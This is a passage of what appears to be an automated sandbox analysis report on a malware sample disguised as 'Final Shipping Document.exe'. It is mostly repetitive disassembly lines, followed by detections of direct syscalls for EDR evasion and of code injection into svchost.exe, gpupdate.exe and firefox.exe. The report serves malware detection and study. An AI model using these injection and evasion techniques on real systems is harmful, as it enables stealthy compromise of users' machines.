            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EBFC mov eax, dword ptr fs:[00000030h]2_2_0335EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BCBF0 mov eax, dword ptr fs:[00000030h]2_2_033BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DEBD0 mov eax, dword ptr fs:[00000030h]2_2_033DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]2_2_03350BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]2_2_03350BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]2_2_03350BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]2_2_03330BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]2_2_03330BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]2_2_03330BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03354A35 mov eax, dword ptr fs:[00000030h]2_2_03354A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03354A35 mov eax, dword ptr fs:[00000030h]2_2_03354A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA38 mov eax, dword ptr fs:[00000030h]2_2_0336CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA24 mov eax, dword ptr fs:[00000030h]2_2_0336CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EA2E mov eax, dword ptr fs:[00000030h]2_2_0335EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BCA11 mov eax, dword ptr fs:[00000030h]2_2_033BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033ACA72 mov eax, dword ptr fs:[00000030h]2_2_033ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033ACA72 mov eax, dword ptr fs:[00000030h]2_2_033ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]2_2_0336CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]2_2_0336CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]2_2_0336CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DEA60 mov eax, dword ptr fs:[00000030h]2_2_033DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340A5B mov eax, dword ptr fs:[00000030h]2_2_03340A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340A5B mov eax, dword ptr fs:[00000030h]2_2_03340A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338AA0 mov eax, dword ptr fs:[00000030h]2_2_03338AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338AA0 mov eax, dword ptr fs:[00000030h]2_2_03338AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03386AA4 mov eax, dword ptr fs:[00000030h]2_2_03386AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368A90 mov edx, dword ptr fs:[00000030h]2_2_03368A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404A80 mov eax, dword ptr fs:[00000030h]2_2_03404A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336AAEE mov eax, dword ptr fs:[00000030h]2_2_0336AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336AAEE mov eax, dword ptr fs:[00000030h]2_2_0336AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330AD0 mov eax, dword ptr fs:[00000030h]2_2_03330AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03364AD0 mov eax, dword ptr fs:[00000030h]2_2_03364AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03364AD0 mov eax, dword ptr fs:[00000030h]2_2_03364AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]2_2_03386ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]2_2_03386ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]2_2_03386ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404940 mov eax, dword ptr fs:[00000030h]2_2_03404940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B892A mov eax, dword ptr fs:[00000030h]2_2_033B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C892B mov eax, dword ptr fs:[00000030h]2_2_033C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC912 mov eax, dword ptr fs:[00000030h]2_2_033BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328918 mov eax, dword ptr fs:[00000030h]2_2_03328918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328918 mov eax, dword ptr fs:[00000030h]2_2_03328918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h]2_2_033AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h]2_2_033AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h]2_2_033D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h]2_2_033D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC97C mov eax, dword ptr fs:[00000030h]2_2_033BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]2_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]2_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]2_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E mov eax, dword ptr fs:[00000030h]2_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E mov edx, dword ptr fs:[00000030h]2_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E mov eax, dword ptr fs:[00000030h]2_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0946 mov eax, dword ptr fs:[00000030h]2_2_033B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B89B3 mov esi, dword ptr fs:[00000030h]2_2_033B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B89B3 mov eax, dword ptr fs:[00000030h]2_2_033B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B89B3 mov eax, dword ptr fs:[00000030h]2_2_033B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033309AD mov eax, dword ptr fs:[00000030h]2_2_033309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033309AD mov eax, dword ptr fs:[00000030h]2_2_033309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h]2_2_033629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h]2_2_033629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE9E0 mov eax, dword ptr fs:[00000030h]2_2_033BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033649D0 mov eax, dword ptr fs:[00000030h]2_2_033649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FA9D3 mov eax, dword ptr fs:[00000030h]2_2_033FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C69C0 mov eax, dword ptr fs:[00000030h]2_2_033C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov ecx, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A830 mov eax, dword ptr fs:[00000030h]2_2_0336A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D483A mov eax, dword ptr fs:[00000030h]2_2_033D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D483A mov eax, dword ptr fs:[00000030h]2_2_033D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC810 mov eax, dword ptr fs:[00000030h]2_2_033BC810
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00C00B62
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BD2622
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BC083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BC083F
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BC09D5 SetUnhandledExceptionFilter,0_2_00BC09D5
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BC0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00BC0C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Final Shipping Document.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\gpupdate.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: NULL target: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: NULL target: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\gpupdate.exeThread register set: target process: 6692Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\gpupdate.exeThread APC queued: target process: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Final Shipping Document.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 295C008Jump to behavior
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C01201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C01201
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BE2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00BE2BA5
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C0B226 SendInput,keybd_event,0_2_00C0B226
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C222DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00C222DA
            Source: C:\Users\user\Desktop\Final Shipping Document.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Final Shipping Document.exe"Jump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeProcess created: C:\Windows\SysWOW64\gpupdate.exe "C:\Windows\SysWOW64\gpupdate.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00C00B62
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C01663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00C01663
            Source: Final Shipping Document.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
